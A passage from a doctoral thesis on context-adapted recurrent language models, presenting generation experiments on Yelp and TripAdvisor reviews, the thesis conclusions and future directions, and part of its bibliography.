used human evaluation. There are multiple ways to report the judgment of the discriminative classifier. The most straightforward is accuracy, which is the percentage of times where the most probable rating according to the classifier matched the context given to the language model. In addition to this metric, we report results in terms of mean absolute deviation (the average absolute difference between the desired rating and the predicted rating). Achieving perfect accuracy is not realistic for this task because there is some natural ambiguity between adjacent star ratings. The fastText classifier has an accuracy of 63% and a median absolute deviation (MAD) of 0.44 stars on the Yelp test data. Figure 6.1 plots the context classification metric from Chapter 4 (accuracy of classifying 78 Figure 6.1: Context classification accuracy versus generation context-specificity for each type of adaptation on the Yelp data. actual reviews using the language model as a classifier) against the generation context- specificity metric (accuracy of classifying automatically generated text with a classifier trained on actual reviews). Each point in this plot is an independent model trained with random hyperparameters. The context classification accuracy is highly predictive of the generation context-specificity. Thus, it is not surprising that the FactorCell models are the most controllable followed by the ConcatCell models and then the SoftmaxBias models. As shown in Figure 6.2, there is a strong correlation between FactorCell rank and context- specificity (r = 0.8) but no relationship (r = 0.00) with perplexity. Having low perplexity is obviously important for high-quality generation but low perplexity by itself is not an indicator that the generated text will match the specified conditions. We included some additional models here that were no used in the experiments in Chapter 4 and were trained with bigger (up to double the size) LSTM hidden states. This is to address the question of whether the gap between models is reduced simply by training a bigger model. The bigger LSTM states do help with perplexity, but we find little to no impact on context-specificity. Table 6.4 lists the perplexity, automatically assessed generation accuracy, and the mean 79 Figure 6.2: Plot of FactorCell rank and perplexity against generation context-specificity accuracy for 14 FactorCell models on the Yelp restaurant data. Model ACC MAD PPL Unadapted 21.3 1.63 67.9 SoftmaxBias 41.1 .88 68.1 ConcatCell 59.6 .44 66.8 FactorCell 69.5 .33 68.1 Table 6.4: Automatically judged generation accuracy, mean absolute deviation (MAD), and perplexity for the three methods of adaptation compared to the unadapted baseline using the models learned from the Yelp data. 80 absolute deviation for each of the four classes of models. Using human raters on a subset of the generated reviews, we confirm that the automatic judgments are correlated with human judgments with r = 0.823. Nine raters judged a set of 145 reviews for this analysis. The raters were able to guess the intended star rating 64% of the time for the FactorCell compared to only 59% of the time for the ConcatCell. 6.3.2 TripAdvisor Hotel Reviews We conduct a similar analysis using the TripAdvisor hotel review data and models from Chapter 4 and check that the hotel class property matches with the generated text. Hotel class is a rating that is reflective of the quality of the service and amenities offered by the hotel and is measured in half integer increments. Only the identity of the hotels and the star rating (sentiment) of each review is provided during training and any information the model learns about class must be derived from the text of the review. Hotel reviews are sampled using a temperature of 1.0, a beam width of 4 and a beam size of 50. Only the first 72 to 100 words of each review were generated and 1,000 samples were collected from 54 independent models. When generating the hotel reviews we pick a random hotel identifier for each one and fix the sentiment at five stars. Like before, these models use a range of hyperparameters in order to study the relationship between the capacity of the model and its performance. The fastText classifier predicts hotel class with an accuracy of 53% and a mean absolute deviation of 0.36 on the TripAdvisor test data. Using this classifiers to judge the generated reviews, we find that the FactorCell is the the most specific for the hotel class. The complete metrics are in Table 6.5. Besides their lack of context-specificity, the unadapted models also suffer from lack of diversity. The unadapted models tend to default to generating reviews that match the largest region in the data, New York City. Up to 35% of the generated reviews from the unadapted models mention the Empire State Building (compared to 2% to 3% for the adapted models) even though only 30% of the training data are from hotels in New York City and only 1.6% of that 30% even mention the Empire State Building. Conditioning on context 81 Model ACC MAD PPL Unadapted 21.3 .77 51.9 SoftmaxBias 30.1 .61 48.7 ConcatCell 30.4 .57 48.8 FactorCell 32.2 .53 48.9 Table 6.5: Automatically judged generation accuracy, mean absolute deviation (MAD), and perplexity for the three methods of adaptation compared to the unadapted baseline using the models learned from the TripAdvisor data. information makes it easier to guide the generation away from the mode and towards more diverse samples. As shown in Figure 6.3, increasing the FactorCell rank helps with context-specificity of the hotel class just as it did with controlling the star rating of the Yelp reviews in Figure 6.2. However, instead of a lack of correlation with perplexity, we see that models with better perplexity also do better at context-specificity. Same as for the Hotel reviews, the accuracy of the models when used as generative text classifiers is predictive of their performance for context-specific generation. We show this relationship in Figure 6.4. We used the TripAdvisor models to test if the difference in context-specificity between the models was due to the quality of the representation learned in the hotel embeddings. We trained a gradient boosted decision tree to predict the hotel class using the hotel embedding as features. As we saw in Figure 4.7, the hotel embeddings naturally group together by class even though they hotel class labels were not available during training. Using five-fold cross validation on the 2,254 embeddings, we found little to no difference between models with both the ConcatCell and FactorCell correctly predicting the class in 67.1% of cases versus 65.3% for the SoftmaxBias model. 82 Figure 6.3: Context-specificity of hotel class versus FactorCell rank and perplexity in gener- ated reviews using the models learned on the TripAdvisor data. Figure 6.4: Context classification accuracy versus generation context-specificity for each type of adaptation on the TripAdvisor data. 83 6.4 Summary Recall that the ConcatCell model only adapts the recurrent layer bias vector. Assuming 200-dimensional word embeddings and a 400 dimensional LSTM, only 1,200 or 0.17% of the recurrent layer parameters change depending on the context. In contrast, a FactorCell model with the same embedding size and recurrent layer dimension and a rank of 25 has 6.25% of its recurrent layer parameters changing depending on context. That’s more than 37 times as many as the ConcatCell. When so few of the parameters are adapted, the result is a blurring of the distinctions between different contexts. We saw this qualitatively in the restaurant review sentence completions and quantitatively when measuring the context-specificity of the restaurant review star rating and the hotel review class. In Chapter 4, we used a context classification metric whereby the language model was used as a generative text classifier on held-out data in order to test its ability to understand the relationship between context and language. The experiments in this chapter show that the context classification metric is a useful predictor of text generation context-specificity. This means that we can assess the relative context-specificity of models independently of the generation hyperparameters (beam size, temperature, etc.) and without the need to construct a classifier or use human ratings to do judgments. This is useful because there are cases where a high quality classifier may not be readily available. For human ratings, not only are they expensive and time-consuming to collect, but there are also certain contexts where humans may be poor judges without special experience or training. Our method of evaluating context-specificity of the generated text has some limitations. Because the fastText classifier is trained on the same data as the language model, it has the potential to reward the language model for memorizing portions of the training data instead of generating novel sentences. Additionally, as we mentioned in the introduction to this chapter, context-specificity alone is not enough to evaluate a language model because it does not measure the ability of the model to generate well-formed text that is free from excessive repetitions and self-contradictions. We know from Chapter 4 that the FactorCell 84 model does have a perplexity that is comparable or better than baseline methods. However, a more comprehensive assessment is needed to take into account all of the desired attributes. 85 Chapter 7 CONCLUSIONS AND FUTURE DIRECTIONS The fact that language changes so dramatically from one situation to the next is both a challenge and an opportunity. It is a challenge because changes in context that may seem trivial to us as humans are enough to break a language model. It is an opportunity because dramatic changes means that large benefits can be accrued through adaptation. As an illus- tration, the 2017 Amazon Alexa prize encouraged people to speak to their device using an open-ended conversational style. This was a change from the task-oriented style that peo- ple normally used to speak with their home assistants. Initially, a generic language model was used for the conversational interactions. When a language model targeting conversa- tional speech was introduced the recognition word error rate dropped by one third (Ram et al., 2018). Adjusting the language model was crucial to enabling people to have long conversations with Alexa. Adaptation is vital to the success of language modeling in real applications and is the reason why this work can have high impact. In this chapter we summarize the contributions of the thesis and suggest possible directions for future work. 7.1 Summary of Contributions Our main contribution is the introduction of the FactorCell model, a new way of thinking about how to adapt the recurrent layer. The FactorCell model moves beyond the paradigm set by Mikolov and Zweig (2012) and used many times since then. The benefits of the FactorCell model include: • A re-conception of the mechanism for recurrent layer adaptation (using context to transform the model rather than as an additional input); 86 • Permitting context to affect a greater change in the model parameters (and therefore its predictions) than what is possible using prior methods; • Including a rank hyperparameter that smoothly trades off between the case where most information is shared between contexts and the opposite situation where the contexts are mostly modeled independently; • Maintaining the property of the ConcatCell approach that the adapted weights can be precomputed and cached resulting in negligible computational overhead compared to an unadapted baseline; and • Off-loading of context specific information from the main recurrent weight matrix to special adaptation tensors, which helps prevent the blurring of the boundary between related contexts. We presented experimental results on nine distinct datasets. Three of them used character- level vocabularies and the other six operated at the word level. One dataset comprised tran- scripts of spoken language; some involved informal written language; and some were more formal. The biggest dataset had over 100 million words of text for training and the smallest was just 5 million characters. In every situation where it was tested, the FactorCell model gave the best perplexity. However the benefits are greater for some contexts. The diversity of data helped to increase the robustness of our conclusions and led us to make some guide- lines about when different aspects of adaptation become more or less important. Specifically, adapting the softmax bias is most effective for topic-based contexts and potentially less ef- fective when the recurrent layer dimensionality is large. Also, the contexts that are most amenable to adaptation are specific and are not easily predicted from a short window of text. An idea that we encountered more than once is that there are differences between models that are not captured by perplexity. In Chapters 3 and 4, we saw that a more flexible adap- tation of the recurrent layer helped the models better distinguish contexts in classification 87 experiments and Chapter 6 showed how models that are better at distinguishing contexts can be used for context-specific generation. There were two places where we saw clear qualitative differences between the FactorCell and the ConcatCell. In Chapter 5, the FactorCell discovered semantic associations between search queries whereas the ConcatCell failed to find such associations and sometimes seemed to focus more on orthography. In Chapter 6, the ConcatCell blurred the boundary between star rating levels (associated with sentiment) and the FactorCell was able to make cleaner distinctions. Taken together, these indicate the FactorCell provides a greater benefit than the improvement in perplexity would suggest. This is likely because the gains are on less frequently used words, and perplexity is dominated by frequent words. We showed how online learning lets the adapted model take advantage of contexts that emerge after training. The method of online adaptation that we introduced in Chapter 5 is generic; it will work for multiple adaptation strategies, including the ConcatCell. However, the FactorCell makes better use of the data stream to continue to increase the quality of its predictions over time. We made some observations about what factors make a dataset more or less amenable to adaptation. These include, from Chapter 3, that context variables that are easily predictable from the text alone are unlikely to be helpful and, from Chapter 4, that for topic related contexts adapting the softmax bias may be more successful. We also found that having a larger sized recurrent layer can lessen the impact of adapting the softmax bias. 7.2 Future Directions There are several promising future directions that build on the work in this thesis. In all six tasks that are explored in Chapter 4, all context factors are available for all training and testing samples. In some scenarios, it may be possible for some context factors to be missing. A simple solution for handling this is to use the expected value for the missing variable(s), since this is equivalent to using a weighted combination of the adaptation matrices for the different possible values of the missing variables. 88 The experiment scenarios all used metadata to specify context, since this type of context can be more sensitive to data sparsity and has been less studied. In contrast, in many prior studies of language model adaptation, context is specified in terms of text samples, such as prior user queries, prior sentences in a dialog, other documents related in terms of topic or style, etc. The FactorCell framework introduced here is also applicable to this type of context, but the best encoding of the text into an embedding (e.g. using bag of words, sequence models, etc.) is likely to vary with the application and remains an area of study for future work. The generation experiments that we conducted were generating text from scratch with no objective other than to obey the constraints imposed by conditioning on the context. In applications, such as machine translation, the generation is conditioned on a source sequence in an encoder-decoder model (also called sequence-to-sequence, or seq2seq) (Cho et al., 2014). The FactorCell model is applicable in these situations as well and one future direction is to test how it performs in that setting. Prior work has already shown that a simple language model that incorporates contextual data can provide gains in machine translation (Drexler et al., 2014). The data we used consisted of one or two context variables such as latitude and longitude or a hotel identifier and star rating. In these cases, it was reasonable to expect the context embedding to summarize the relevant information from both variables. If there were many more context variables then that assumption may no longer hold. More work is needed to find an appropriate dataset that has multiple context variables and to investigate appropriate methods of providing the context information to the FactorCell model. In Chapter 3, we showed that using hashing to adapt the output layer bias benefits per- plexity for high dimensional contexts. This indicates that the low-rank adaptation of the bias does not fully model the context-dependent language. We suggested that the model could benefit from a sparse correction to the low-rank adaptation and that could be accom- plished by including an L1 penalty term to the adaptation parameters. This idea is partially explored in Appendix A, but more work is needed to investigate the benefits of sparsity in 89 language model adaptation. Our focus was on language modeling, but RNNs are widely used in many other natural language processing tasks and in other domains that have little or nothing to do with language such as acoustic modeling (Graves et al., 2006), time-series analysis, music generation (Goel et al., 2014), and more. For example, some work on other natural language processing tasks, such as spoken language understanding, have already made use of the ConcatCell style adaptation (Mesnil et al., 2015). Personalization would be of high utility in these applications. This thesis looked at query completion, but there are often text prediction applications that this work is relevant to, including next word prediction for mobile text input and augmentative communication for people with disabilities. For augmentative communications, the method would also apply to icon-based communication, which relies on a language model with icons instead of words or characters (Dudy and Bedrick, 2018). It is difficult to predict what future state-of-the-art language models will look like. Re- current neural networks have been reliable winners for the past few years. There is active work on alternate architectures that remedy some of the perceived weaknesses (mostly lack of easy parallelism) of the RNN, such as the Quasi-Recurrent Neural Network (Bradbury et al., 2017) and the Transformer Network (Vaswani et al., 2017). It seems likely that the adaptation techniques from this thesis will apply to those architectures as well, but it remains to be tested. 90 BIBLIOGRAPHY Jimmy Lei Ba, Jamie Ryan Kiros, and Geoffrey E Hinton. 2016. Layer normalization. arXiv preprint arXiv:1607.06450. Dzmitry Bahdanau, Jan Chorowski, Dmitriy Serdyuk, Yoshua Bengio, et al. 2016. End-to- end attention-based large vocabulary speech recognition. In Proc. ICASSP, pages 4945– 4949. Lalit Bahl, James Baker, Paul Cohen, Fred Jelinek, Burn Lewis, and R Mercer. 1978. Recog- nition of continuously read natural corpus. In Proc. ICASSP, volume 3, pages 422–424. Ziv Bar-Yossef and Naama Kraus. 2011. Context-sensitive query auto-completion. In Proc. WWW, pages 107–116. Jerome R Bellegarda. 2000. Exploiting latent semantic information in statistical language modeling. Proceedings of the IEEE, 88(8):1279–1296. Jerome R Bellegarda. 2004. Statistical language model adaptation: review and perspectives. Speech Communication, 42(1):93–108. Yoshua Bengio, Réjean Ducharme, Pascal Vincent, and Christian Jauvin. 2003a. A neural probabilistic language model. Journal of machine learning research, 3(Feb):1137–1155. Yoshua Bengio, Jean-Sébastien Senécal, et al. 2003b. Quick training of probabilistic neural nets by importance sampling. In Proc. AISTATS. Steven Bird, Ewan Klein, and Edward Loper. 2009. Natural Language Processing with Python. O’Reilly Media. 91 Burton H Bloom. 1970. Space/time trade-offs in hash coding with allowable errors. Com- munications of the ACM, 13(7):422–426. Samuel R. Bowman, Luke Vilnis, Oriol Vinyals, Andrew Dai, Rafal Jozefowicz, and Samy Bengio. 2016. Generating sentences from a continuous space. In Proceedings of The 20th SIGNLL Conference on Computational Natural Language Learning, pages 10–21. Association for Computational Linguistics. James Bradbury, Stephen Merity, Caiming Xiong, and Richard Socher. 2017. Quasi-recurrent neural networks. Proc. ICLR. Thorsten Brants, Ashok C Popat, Peng Xu, Franz J Och, and Jeffrey Dean. 2007. Large language models in machine translation. In Proc. EMNLP. Peter F Brown, Peter V Desouza, Robert L Mercer, Vincent J Della Pietra, and Jenifer C Lai. 1992. Class-based n-gram models of natural language. Computational Linguistics, 18(4):467–479. Ivan Bulyko, Mari Ostendorf, and Andreas Stolcke. 2003. Getting more mileage from web text sources for conversational speech language modeling using class-dependent mixtures. In Proc. HLT-NAACL, pages 7–9. Fei Cai, Maarten De Rijke, et al. 2016. A survey of query auto-completion in information retrieval. Foundations and Trends in Information Retrieval, 10(4):273–363. Fei Cai, Shangsong Liang, and Maarten De Rijke. 2014. Time-sensitive personalized query auto-completion. In Proc. CIKM, pages 1599–1608. William Chan, Navdeep Jaitly, Quoc V Le, and Oriol Vinyals. 2015. Listen, attend and spell. arXiv preprint arXiv:1508.01211. Ciprian Chelba and Noam Shazeer. 2015. Sparse non-negative matrix language modeling 92 for geo-annotated query session data. In Proc. Automatic Speech Recognition and Under- standing (ASRU), 2015 IEEE Workshop on, pages 8–14. Ciprian Chelba, Xuedong Zhang, and Keith B Hall. 2015. Geo-location for voice search language modeling. In Proc. Interspeech, pages 1438–1442. Wenlin Chen, David Grangier, and Michael Auli. 2016. Strategies for training large vocab- ulary neural language models. In Proc. ACL. Xie Chen, Tian Tan, Xunying Liu, Pierre Lanchantin, Moquan Wan, Mark JF Gales, and Philip C Woodland. 2015. Recurrent neural network language model adaptation for multi- genre broadcast speech recognition. In Proc. InterSpeech. Kyunghyun Cho, Bart Van Merriënboer, Caglar Gulcehre, Dzmitry Bahdanau, Fethi Bougares, Holger Schwenk, and Yoshua Bengio. 2014. Learning phrase representa- tions using RNN encoder-decoder for statistical machine translation. arXiv preprint arXiv:1406.1078. Junyoung Chung, Kyunghyun Cho, and Yoshua Bengio. 2016. A character-level decoder without explicit segmentation for neural machine translation. In Proc. ACL. Mathias Creutz, Teemu Hirsimäki, Mikko Kurimo, Antti Puurula, Janne Pylkkönen, Ṽesa Siivola, Matti Varjokallio, Ebru Arisoy, Murat Saraçlar, and Andreas Stolcke. 2007. Morph- based speech recognition and modeling of out-of-vocabulary words across languages. ACM Transactions on Speech and Language Processing (TSLP), 5(1):3. Salil Deena, Madina Hasan, Mortaza Doulaty, Oscar Saz, and Thomas Hain. 2016. Com- bining feature and model-based adaptation of RNNLMs for multi-genre broadcast speech recognition. In Proc. Interspeech, pages 2343–2347. Renato DeMori and Marcello Federico. 1999. Language model adaptation. In Computational models of speech pattern processing, pages 280–303. 93 Adji B Dieng, Chong Wang, Jianfeng Gao, and John Paisley. 2016. TopicRNN: a recurrent neural network with long-range semantic dependency. arXiv preprint arXiv:1611.01702. Jennifer Drexler, Pushpendre Rastogi, Jacqueline Aguilar, Benjamin Van Durme, and Matt Post. 2014. A Wikipedia-based corpus for contextualized machine translation. In Proc. LREC, pages 3593–3596. Shiran Dudy and Steven Bedrick. 2018. Compositional language modeling for icon-based augmentative and alternative communication. Northwest NLP Regional Workshop. J. Eisenstein, A. Ahmed, and E. Xing. 2011a. Sparse additive generative models of text. In Proc. ICML. Jacob Eisenstein, Amr Ahmed, and Eric P. Xing. 2011b. Sparse additive generative models of text. In Proc. ICML. Jacob Eisenstein, Brendan O’Connor, Noah A Smith, and Eric P Xing. 2010. A latent variable model for geographic lexical variation. In Proc. EMNLP, pages 1277–1287. Jessica Ficler and Yoav Goldberg. 2017. Controlling linguistic style aspects in neural language generation. In Proc. EMNLP Workshop on Stylistic Variation. Siva Reddy Gangireddy, Pawel Swietojanski, Peter Bell, and Steve Renals. 2016. Unsuper- vised adaptation of recurrent neural network language models. In Proc. Interspeech, pages 2333–2337. Roberto Gemello, Franco Mana, Stefano Scanzio, Pietro Laface, and Renato De Mori. 2007. Linear hidden transformations for adaptation of hybrid ANN/HMM models. Speech Com- munication, 49(10-11):827–835. Shalini Ghosh, Oriol Vinyals, Brian Strope, Scott Roy, Tom Dean, and Larry Heck. 2016. Contextual LSTM models for large scale NLP tasks. arXiv preprint arXiv:1602.06291. 94 James R Glass, Timothy J Hazen, D Scott Cyphers, Igor Malioutov, David Huynh, and Regina Barzilay. 2007. Recent progress in the MIT spoken lecture processing project. In Proc. Interspeech, pages 2553–2556. Kratarth Goel, Raunaq Vohra, and JK Sahoo. 2014. Polyphonic music generation by mod- eling temporal dependencies using a RNN-DBN. In Proc. International Conference on Artificial Neural Networks, pages 217–224. Ian J Goodfellow, Mehdi Mirza, Da Xiao, Aaron Courville, and Yoshua Bengio. 2013. An empirical investigation of catastrophic forgetting in gradient-based neural networks. arXiv preprint arXiv:1312.6211. Edouard Grave, Armand Joulin, and Nicolas Usunier. 2017a. Improving neural language models with a continuous cache. In Proc. ICLR, volume abs/1612.04426. Edouard Grave, Tomáš Mikolov, Armand Joulin, and Piotr Bojanowski. 2017b. Bag of tricks for efficient text classification. In EACL. Alex Graves, Santiago Fernández, Faustino Gomez, and Jürgen Schmidhuber. 2006. Connec- tionist temporal classification: labelling unsegmented sequence data with recurrent neural networks. In Proc. ICML, pages 369–376. ACM. Alex Graves and Navdeep Jaitly. 2014. Towards end-to-end speech recognition with recurrent neural networks. In Proc. ICML, volume 14, pages 1764–1772. Klaus Greff, Rupesh K Srivastava, Jan Koutńık, Bas R Steunebrink, and Jürgen Schmid- huber. 2016. LSTM: A search space odyssey. IEEE transactions on neural networks and learning systems, 28:2222–2232. David Ha, Andrew Dai, and Quoc V Le. 2017. Hypernetworks. In Proc. ICLR. Yoni Halpern, Keith Hall, Vlad Schogol, Michael Riley, Brian Roark, Gleb Skobeltsyn, and 95 Martin Baeuml. 2016. Contextual prediction models for speech recognition. In Proc. Interspeech. Bo Han, Paul Cook, and Timothy Baldwin. 2014. Text-based twitter user geolocation pre- diction. J. Artif. Intell. Res., 49:451–500. Awni Hannun, Carl Case, Jared Casper, Bryan Catanzaro, Greg Diamos, Erich Elsen, Ryan Prenger, Sanjeev Satheesh, Shubho Sengupta, Adam Coates, et al. 2014. Deep speech: Scaling up end-to-end speech recognition. arXiv preprint arXiv:1412.5567. Cong Duy Vu Hoang, Trevor Cohn, and Gholamreza Haffari. 2016. Incorporating side infor- mation into recurrent neural network language models. In Proc. HLT-NAACL. Ari Holtzman, Jan Buys, Maxwell Forbes, Antoine Bosselut, and Yejin Choi. 2018. https://openreview.net/forum?id=r1lfpfZAb Learning to write by learning the objective. Bo-June Paul Hsu and James Glass. 2008. N-gram weighting: reducing training data mis- match in cross-domain language model estimation. In Proc. EMNLP, pages 829–838. Zhiting Hu, Zichao Yang, Xiaodan Liang, Ruslan Salakhutdinov, and Eric P Xing. 2017. Toward controlled generation of text. In Proc. ICML, pages 1587–1596. B. Hutchinson, M. Ostendorf, and M. Fazel. 2015. A sparse plus low-rank exponential language model for limited resource scenarios. IEEE Trans. Audio, Speech and Language Processing, 23(3):494–504. Brian Hutchinson, Mari Ostendorf, and Maryam Fazel. 2013. Exceptions in language as learned by the multi-factor sparse plus low-rank language model. In Proc. ICASSP, pages 8580–8584. Hakan Inan, Khashayar Khosravi, and Richard Socher. 2016. Tying word vectors and word classifiers: A loss framework for language modeling. arXiv preprint arXiv:1611.01462. 96 Kazuki Irie, Shankar Kumar, Michael Nirschl, and Hank Liao. 2018. RADMM: Recurrent adaptive mixture model with applications to domain robust language modeling. Aaron Jaech, George Mulcaire, Shobhit Hathi, Mari Ostendorf, and Noah A Smith. 2016. Hierarchical character-word models for language identification. In EMNLP Workshop on NLP for Social Media,. Aaron Jaech and Mari Ostendorf. 2015. Leveraging Twitter for low-resource conversational speech language modeling. arXiv preprint arXiv:1504.02490. Aaron Jaech and Mari Ostendorf. 2017. http://ajaech.me/adeeehllnorru Improving context aware language models. arXiv preprint arXiv:1704.06380. Aaron Jaech and Mari Ostendorf. 2018a. Low-rank RNN adaptation for context-aware lan- guage modeling. TACL. Aaron Jaech and Mari Ostendorf. 2018b. Personalized language model for query auto- completion. In Proc. ACL. Sébastien Jean, Kyunghyun Cho, Roland Memisevic, and Yoshua Bengio. 2014. On using very large target vocabulary for neural machine translation. In Proc. ACL-IJCNLP. Fred Jelinek. 1990. Self-organized language modeling for speech recognition. Readings in speech recognition, pages 450–506. Fred Jelinek. 1991. Up from trigrams. In Proc. Eurospeech. Fred Jelinek, Bernard Mérialdo, Salim Roukos, and M. Strauss. 1991. A dynamic language model for speech recognition. In Proc. HLT. Yangfeng Ji, Trevor Cohn, Lingpeng Kong, Chris Dyer, and Jacob Eisenstein. 2015. Docu- ment context language models. arXiv preprint arXiv:1511.03962. 97 Mika Juuti, Bo Sun, Tatsuya Mori, and N Asokan. 2018. Stay on-topic: Generating context- specific fake restaurant reviews. arXiv preprint arXiv:1805.02400. Andrej Karpathy, Justin Johnson, and Li Fei-Fei. 2015. Visualizing and understanding recurrent networks. In Proc. ICLR. Slava Katz. 1987. Estimation of probabilities from sparse data for the language model component of a speech recognizer. IEEE transactions on acoustics, speech, and signal processing, 35(3):400–401. Diederik P Kingma and Jimmy Ba. 2014. Adam: A method for stochastic optimization. arXiv preprint arXiv:1412.6980. Katrin Kirchhoff and Mei Yang. 2005. Improved language modeling for statistical machine translation. In Proc. of the ACL Workshop on Building and Using Parallel Texts, pages 125–128. Reinhard Kneser and Hermann Ney. 1995. Improved backing-off for m-gram language mod- eling. In Proc. ICASSP, volume 1, pages 181–184. Ben Krause, Emmanuel Kahembwe, Iain Murray, and Steve Renals. 2017. Dynamic evalua- tion of neural sequence models. arXiv preprint arXiv:1709.07432. Oleksii Kuchaiev and Boris Ginsburg. 2017. Factorization tricks for LSTM networks. arXiv preprint arXiv:1703.10722. Roland Kuhn and Renato De Mori. 1990. A cache-based natural language model for speech recognition. IEEE transactions on pattern analysis and machine intelligence, 12(6):570– 583. Jason Lee, Kyunghyun Cho, and Thomas Hofmann. 2017. Fully character-level neural ma- chine translation without explicit segmentation. TACL, 5:365–378. 98 Tao Lei, Yu Xin, Yuan Zhang, Regina Barzilay, and Tommi S. Jaakkola. 2014. Low-rank tensors for scoring dependency structures. In ACL. Jiwei Li, Michel Galley, Chris Brockett, Jianfeng Gao, and Bill Dolan. 2016. A persona-based neural conversation model. Proc. ACL. Juncen Li, Robin Jia, He He, and Percy Liang. 2018. Delete, retrieve, generate: A simple approach to sentiment and style transfer. arXiv preprint arXiv:1804.06437. Bing Liu and Ian Lane. 2017. Dialog context language modeling with recurrent neural networks. In Proc. ICASSP, pages 5715–5719. Yi Luan, Yangfeng Ji, and Mari Ostendorf. 2016. LSTM based conversation models. arXiv preprint arXiv:1603.09457. Min Ma, Michael Nirschl, Fadi Biadsy, and Shankar Kumar. 2017. Approaches for neural- network language model adaptation. In Proc. Interspeech 2017, pages 259–263. Andrew L Maas, Ziang Xie, Dan Jurafsky, and Andrew Y Ng. 2015. Lexicon-free conversa- tional speech recognition with neural networks. In Proc. NAACL. Gábor Melis, Chris Dyer, and Phil Blunsom. 2018. On the state of the art of evaluation in neural language models. In Proc. ICLR. Gideon Mendels, Erica Cooper, Victor Soto, Julia Hirschberg, Mark Gales, Kate Knill, Anton Ragni, and Haipeng Wang. 2015. Improving speech recognition and keyword search for low resource languages using web data. In Proc. INTERSPEECH. Stephen Merity, Nitish Shirish Keskar, and Richard Socher. 2017a. Regularizing and opti- mizing LSTM language models. arXiv preprint arXiv:1708.02182. Stephen Merity, Caiming Xiong, James Bradbury, and Richard Socher. 2017b. Pointer sen- tinel mixture models. In Proc. ICLR. 99 Grégoire Mesnil, Yann Dauphin, Kaisheng Yao, Yoshua Bengio, Li Deng, Dilek Hakkani- Tur, Xiaodong He, Larry Heck, Gokhan Tur, Dong Yu, et al. 2015. Using recurrent neural networks for slot filling in spoken language understanding. IEEE/ACM Transactions on Audio, Speech, and Language Processing, 23(3):530–539. Tomáš Mikolov, Anoop Deoras, Daniel Povey, Lukáš Burget, and Jan Černockỳ. 2011. Strate- gies for training large scale neural network language models. In Automatic Speech Recog- nition and Understanding (ASRU), IEEE Workshop on, pages 196–201. Tomáš Mikolov, Martin Karafiát, Lukáš Burget, Jan Černockỳ, and Sanjeev Khudanpur. 2010. Recurrent neural network based language model. In Proc. Interspeech. Tomáš Mikolov and Geoffrey Zweig. 2012. Context dependent recurrent neural network language model. In Proc. SLT, pages 234–239. Bhaskar Mitra and Nick Craswell. 2015. Query auto-completion for rare prefixes. In Proc. CIKM, pages 1755–1758. Andriy Mnih and Koray Kavukcuoglu. 2013. Learning word embeddings efficiently with noise-contrastive estimation. In Proc. NIPS, pages 2265–2273. Giovanni Molina, Fahad AlGhamdi, Mahmoud Ghoneim, Abdelati Hawwari, Nicolas Rey- Villamizar, Mona Diab, and Thamar Solorio. 2016. Overview for the second shared task on language identification in code-switched data. In Second Workshop on Computational Approaches to Code Switching, pages 40–49. Frederic Morin and Yoshua Bengio. 2005. Hierarchical probabilistic neural network language model. In Proc. AISTATS, volume 5, pages 246–252. Graham Neubig and Chris Dyer. 2016. Generalizing and hybridizing count-based and neural language models. In Proc. EMNLP. 100 Miles Osborne, Ashwin Lall, and Benjamin Van Durme. 2014. Exponential reservoir sampling for streaming language models. Proc. ACL. Robert Östling and Jörg Tiedemann. 2017. Continuous multilinguality with language vectors. Proc. EACL. Ankur P Parikh, Avneesh Saluja, Chris Dyer, and Eric P Xing. 2014. Language modeling with power low rank ensembles. In Proc. EMNLP. Dae Hoon Park and Rikio Chiba. 2017. A neural language model for query auto-completion. In Proc. SIGIR, pages 1189–1192. Razvan Pascanu, Tomáš Mikolov, and Yoshua Bengio. 2013. On the difficulty of training recurrent neural networks. In Proc. ICML, pages 1310–1318. Greg Pass, Abdur Chowdhury, and Cayley Torgeson. 2006. A picture of search. InfoScale, 152:1. Ofir Press and Lior Wolf. 2017. Using the output embedding to improve language models. In Proc. EACL. Alec Radford, Rafal Jozefowicz, and Ilya Sutskever. 2017. Learning to generate reviews and discovering sentiment. arXiv preprint arXiv:1704.01444. Anton Ragni, Edgar Dakin, Xie Chen, Mark J F Gales, and Kate M Knill. 2016. Multi- language neural network language models. In Proc. Interspeech. Ashwin Ram, Rohit Prasad, Chandra Khatri, Anu Venkatesh, Raefer Gabriel, Qing Liu, Jeff Nunn, Behnam Hedayatnia, Ming Cheng, Ashish Nagar, et al. 2018. Conversational AI: The science behind the alexa prize. In Proc. NIPS. Nils Reimers and Iryna Gurevych. 2017. Reporting score distributions makes a difference: Performance study of LSTM-networks for sequence tagging. In Proc. EMNLP. 101 Giuseppe Riccardi and Allen L Gorin. 2000. Stochastic language adaptation over time and state in natural spoken dialog systems. IEEE Transactions on Speech and Audio Process- ing, 8(1):3–10. Roni Rosenfeld. 1995. Optimizing lexical and ngram coverage via judicious use of linguistic data. In Proc. Eurospeech. Roni Rosenfeld. 1996. A maximum entropy approach to adaptive statistical language mod- eling. Computer, Speech and Language, 10:187–228. Roni Rosenfeld. 2000. Two decades of statistical language modeling: Where do we go from here? Proceedings of the IEEE, 88(8):1270–1278. Murat Saraçlar, Tunga Güngör, et al. 2010. Morphology-based and sub-word language mod- eling for Turkish speech recognition. In 2010 IEEE International Conference on Acoustics, Speech and Signal Processing, pages 5402–5405. Sarah E. Schwarm, Ivan Bulyko, and Mari Ostendorf. 2004. Adaptive language modeling with varied sources to cover new vocabulary items. IEEE Trans. Speech and Audio Processing, 12:334–342. Holger Schwenk. 2004. Efficient training of large neural networks for language modeling. In 2004 IEEE International Joint Conference on Neural Networks, volume 4, pages 3059– 3064. Stanislau Semeniuta, Aliaksei Severyn, and Erhardt Barth. 2016. Recurrent dropout without memory loss. In Proc. COLING. Noam Shazeer, Joris Pelemans, and Ciprian Chelba. 2015. Sparse non-negative matrix lan- guage modeling for skip-grams. In Proc. Interspeech, pages 1428–1432. Milad Shokouhi. 2013. Learning to personalize query auto-completion. In Proc. SIGIR, pages 103–112. 102 Milad Shokouhi and Kira Radinsky. 2012. Time-sensitive query auto-completion. In Proc. SIGIR, pages 601–610. Manhung Siu and Mari Ostendorf. 2000. Variable n-grams and extensions for conversational speech language modeling. IEEE Transactions on Speech and Audio Processing, 8(1):63– 75. Alessandro Sordoni, Yoshua Bengio, Hossein Vahabi, Christina Lioma, Jakob Grue Simonsen, and Jian-Yun Nie. 2015. A hierarchical recurrent encoder-decoder for generative context- aware query suggestion. In Proc. CIKM, pages 553–562. Martin Sundermeyer, Ralf Schlüter, and Hermann Ney. 2012. LSTM 